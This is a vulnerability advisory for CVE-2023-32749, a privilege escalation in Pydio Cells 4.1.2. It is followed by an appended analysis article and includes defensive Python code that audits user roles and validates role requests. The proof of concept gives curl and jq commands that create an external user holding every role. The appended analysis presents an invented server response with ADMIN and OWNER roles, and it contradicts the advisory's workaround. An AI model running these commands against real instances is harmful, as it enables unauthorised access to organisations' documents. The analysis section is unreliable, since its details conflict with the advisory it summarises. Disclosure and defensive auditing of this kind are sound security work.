Pydio Cells 4.1.2 - Unauthorised Role Assignments

Exploit Author: RedTeam Pentesting GmbH
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2023-05-31
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows the sharing user either to select
an already existing user from a list or, if this functionality is
enabled, to create a new user by entering a new username and password.
When a new user is created in this way, an HTTP PUT request like the
following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [....],
  "PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The "Roles" list in the HTTP request can instead be
populated with the UUIDs of all available roles, which can be obtained
through the user search functionality. The result is a new user account
with all roles applied. Logging in as the newly created user then grants
access to all cells and non-personal workspaces of the whole Pydio
instance.


Proof of Concept
================

Log in to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can be done either with an HTTP
attack proxy or with the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json

{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json

{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new external
user:

------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, log in with the newly created user to access all cells and
non-personal workspaces.
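As a defensive counterpart to the user listing above (an added example, not part of the advisory): the same /a/user output can be checked for external accounts that carry roles beyond the two defaults described in "More Details". Field names follow the response shown there; the sample users and the UUIDs other than the advisory's own are constructed.

```python
import json

# Defaults a shared (external) user receives, per the advisory's response:
# the EXTERNAL_USERS role plus a per-user role ("UserRole": true) whose
# Uuid equals the user's own Uuid. Anything else is worth a closer look.
DEFAULT_SHARED_ROLE = "EXTERNAL_USERS"

def unexpected_roles(user):
    """Role UUIDs on a shared-profile user beyond the two defaults."""
    if user.get("Attributes", {}).get("profile") != "shared":
        return []  # only external accounts are in scope for this check
    own_uuid = user.get("Uuid")
    extra = []
    for role in user.get("Roles", []):
        uuid = role.get("Uuid")
        if uuid == DEFAULT_SHARED_ROLE:
            continue
        if role.get("UserRole") and uuid == own_uuid:
            continue
        extra.append(uuid)  # e.g. another user's role or a group role
    return extra

def audit_users(users_json):
    """Parse a /a/user response body ({"Users": [...]}) and map each
    login that has unexpected roles to the list of those role UUIDs."""
    findings = {}
    for user in json.loads(users_json).get("Users", []):
        extra = unexpected_roles(user)
        if extra:
            findings[user["Login"]] = extra
    return findings

# Constructed sample (not real data): a benign external user, and an
# external user carrying another user's role plus a constructed group role.
SAMPLE_USERS = json.dumps({"Users": [
    {"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "Login": "newuser",
     "Attributes": {"profile": "shared"},
     "Roles": [{"Uuid": "EXTERNAL_USERS"},
               {"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "UserRole": True}]},
    {"Uuid": "aaaaaaaa-0000-4000-8000-000000000001", "Login": "foobar",
     "Attributes": {"profile": "shared"},
     "Roles": [{"Uuid": "EXTERNAL_USERS"},
               {"Uuid": "aaaaaaaa-0000-4000-8000-000000000001", "UserRole": True},
               {"Uuid": "cccccccc-0000-4000-8000-000000000003"},
               {"Uuid": "bbbbbbbb-0000-4000-8000-000000000002", "UserRole": True}]},
]})

if __name__ == "__main__":
    for login, roles in audit_users(SAMPLE_USERS).items():
        print(f"{login}: unexpected roles {roles}")
```

Run against a freshly saved all_users.json instead of the constructed sample to find accounts that were created this way before the upgrade.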

Workaround
==========

Disallow the creation of external users in the authentication settings.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT security experts. In this way, security weaknesses
in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/


Pydio Cells 4.1.2 - Unauthorised Role Assignments: A Critical Privilege Escalation Vulnerability

Pydio Cells, an open-core, self-hosted document sharing and collaboration platform, is designed for organizations requiring secure, compliant, and scalable file management. However, a critical vulnerability discovered in version 4.1.2 and earlier versions—CVE-2023-32749—exposes a serious flaw in role assignment logic, enabling unauthorized privilege escalation. This flaw allows attackers to create new users with full administrative access, bypassing intended access controls.

Understanding the Vulnerability: Role Assignment Flaw in User Creation

Pydio Cells allows users to share folders or entire "cells" (virtual workspaces) with other users on the same instance. When a user chooses to create a new account via the web interface, the system sends a PUT request to the /a/user/newuser endpoint. This request includes user credentials and a Roles field.


PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
 "Attributes": {
  "profile": "shared",
  "parameter:core.conf:lang": "\"en-us\"",
  "send_email": "false"
 },
 "Roles": [],
 "Login": "newuser",
 "Password": "secret!",
 "GroupPath": "/",
 "Policies": [...]
}

Notice that the Roles field is initially set to an empty array []. This is the client's default, but the server does not enforce it during validation. An attacker can manipulate this field by injecting a list of all available role UUIDs, obtained through the user search functionality, into the request.

Exploitation: How the Attack Works

After sending a modified request with a populated Roles array, the server responds with a JSON object that includes the newly created user’s roles. The response reveals two roles:

  • EXTERNAL_USERS – a default role for external collaborators.
  • 58811c4c-2286-4ca0-8e8a-14ab9dbca8ce – a unique role assigned to the new user, marked as UserRole: true.

However, if the attacker includes additional UUIDs—such as ADMIN, OWNER, or SYSTEM—in the Roles array, the system applies those roles without proper validation. The result? A new user account with full administrative privileges across the entire Pydio instance.


{
 "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
 "GroupPath": "/",
 "Attributes": {
  "parameter:core.conf:lang": "\"en-us\"",
  "profile": "shared"
 },
 "Roles": [
  {
   "Uuid": "EXTERNAL_USERS",
   "Label": "External Users",
   "Policies": [...]
  },
  {
   "Uuid": "ADMIN",
   "Label": "Administrator",
   "Policies": [...]
  },
  {
   "Uuid": "OWNER",
   "Label": "Owner",
   "Policies": [...]
  }
 ],
 "Login": "newuser",
 "Policies": [...],
 "PoliciesContextEditable": true
}

This response confirms that the user newuser now holds multiple high-privilege roles. The PoliciesContextEditable flag indicates the user can modify policies, further enabling control over access rights.

Impact and Security Risk

The vulnerability is classified as Privilege Escalation with a high security risk. An attacker with access to the user creation endpoint—whether via a low-privileged account or through a compromised session—can:

  • Create a new user with full administrative access.
  • Access all cells, including non-personal workspaces and sensitive data.
  • Modify user roles, policies, and system settings.
  • Perform actions equivalent to an administrator, including data deletion, user management, and system configuration.

Even if the user creation feature is disabled, the vulnerability remains exploitable if any authenticated user can initiate the request through a crafted API call—especially if API endpoints are not properly secured.

Real-World Implications

Consider a scenario where an organization uses Pydio Cells for internal document collaboration. An employee with limited access (e.g., a standard user) discovers the vulnerability. By crafting a malicious PUT request, they can:

  • Register a new account with ADMIN role.
  • Log in as the new user.
  • Access all project folders, including those belonging to executives or IT administrators.
  • Exfiltrate sensitive documents, modify access rules, or disable security features.

This scenario highlights how a single flaw can undermine an entire organization’s data security model.

Vendor Response and Mitigation

Pydio has acknowledged the vulnerability and released fixes in:

  • Pydio Cells 4.2.0 – major release with security enhancements.
  • Pydio Cells 4.1.3 – patch update for 4.1.x series.
  • Pydio Cells 3.0.12 – security patch for older versions.

The fix involves strict validation of the Roles field during user creation. Only predefined roles (e.g., EXTERNAL_USERS) are allowed by default, and administrators must explicitly assign additional roles via secure interfaces.
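An illustration of the allowlist check described in this paragraph, added here as example code and not taken from Pydio Cells: a non-administrative requester may only pass EXTERNAL_USERS in Roles, while the server itself still adds that default for shared profiles. The function names and the constructed request bodies are assumptions; the body shape follows the PUT /a/user/newuser request shown above.

```python
# Roles a non-administrative requester may pass in the "Roles" field when
# creating a shared (external) user; everything else needs an administrator.
DEFAULT_ALLOWED_ROLES = frozenset({"EXTERNAL_USERS"})

class RoleAssignmentDenied(Exception):
    """The requester tried to grant roles it is not allowed to grant."""

def requested_role_uuids(body):
    """Extract and de-duplicate the role UUIDs from the request body.
    Entries are objects like {"Uuid": "..."} as in the advisory's request."""
    uuids = []
    for role in body.get("Roles", []):
        uuid = role.get("Uuid") if isinstance(role, dict) else None
        if not isinstance(uuid, str) or not uuid:
            raise ValueError("malformed entry in Roles")
        if uuid not in uuids:
            uuids.append(uuid)
    return uuids

def roles_for_new_user(body, requester_is_admin):
    """Decide which roles a new user gets: the client-supplied list is
    checked against the allowlist unless the requester is an administrator,
    and the server adds the EXTERNAL_USERS default for shared profiles."""
    requested = requested_role_uuids(body)
    if not requester_is_admin:
        denied = [u for u in requested if u not in DEFAULT_ALLOWED_ROLES]
        if denied:
            raise RoleAssignmentDenied(f"not grantable by requester: {denied}")
    roles = list(requested)
    if body.get("Attributes", {}).get("profile") == "shared" \
            and "EXTERNAL_USERS" not in roles:
        roles.insert(0, "EXTERNAL_USERS")
    return roles

# Constructed request bodies (hypothetical), following the shape of the
# PUT /a/user/<login> request shown in the advisory (Policies omitted).
BENIGN_BODY = {"Login": "newuser", "Password": "secret!", "GroupPath": "/",
               "Attributes": {"profile": "shared"}, "Roles": []}
ESCALATING_BODY = {"Login": "foobar", "Password": "hunter2",
                   "Attributes": {"profile": "shared"},
                   "Roles": [{"Uuid": "EXTERNAL_USERS"},
                             {"Uuid": "cccccccc-0000-4000-8000-000000000003"}]}

if __name__ == "__main__":
    print(roles_for_new_user(BENIGN_BODY, requester_is_admin=False))
    try:
        roles_for_new_user(ESCALATING_BODY, requester_is_admin=False)
    except RoleAssignmentDenied as exc:
        print("rejected:", exc)
```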

Best Practices for Organizations Using Pydio Cells

To mitigate risks, organizations should:

  • Update immediately to version 4.2.0 or 4.1.3.
  • Disable user creation functionality if not required.
  • Enforce role-based access control (RBAC) with audit logs.
  • Monitor API endpoints for unauthorized PUT requests.
  • Use multi-factor authentication (MFA) for administrative accounts.

Additional Security Recommendations

For developers and system administrators, consider implementing:

  • Input validation on all user creation endpoints.
  • Role assignment via a secure, authenticated admin interface only.
  • Rate limiting and logging for API calls.
  • Regular security audits and penetration testing.

Always assume that attackers can manipulate any field in an API request unless it is explicitly validated and restricted.

Conclusion

CVE-2023-32749 is a stark reminder that even well-designed systems can fall victim to subtle flaws in access control logic. The Pydio Cells vulnerability demonstrates how a seemingly innocuous role assignment field can become a gateway to full system compromise. Organizations must prioritize timely updates, strict input validation, and proactive security monitoring to prevent such exploits.